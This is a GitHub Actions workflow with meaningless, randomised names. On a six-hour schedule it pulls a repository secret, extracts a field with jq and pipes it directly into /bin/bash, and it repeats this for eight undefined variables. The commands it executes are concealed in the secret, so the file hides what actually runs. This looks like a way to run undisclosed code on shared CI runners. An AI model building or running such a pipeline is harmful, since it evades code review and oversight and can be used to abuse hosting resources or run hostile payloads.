name: yangxiaosan3728
on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangxiaosan3728
        env:
          rua1866: ${{ secrets.rua1866 }}
        run: |
          echo $rua1866 | jq -r .mgl52 | /bin/bash
          echo $vkks09 | jq -r .mw222 | /bin/bash
          echo $femis7964 | jq -r .qqoz9 | /bin/bash
          echo $f02009 | jq -r .awqao47884 | /bin/bash
          echo $qt97090 | jq -r .oyvdn73503 | /bin/bash
          echo $qcvsw78 | jq -r .kdttf9236 | /bin/bash
          echo $slh19 | jq -r .t5 | /bin/bash
          echo $cbp708 | jq -r .audyu6453 | /bin/bash
          echo $n118 | jq -r .l4 | /bin/bash

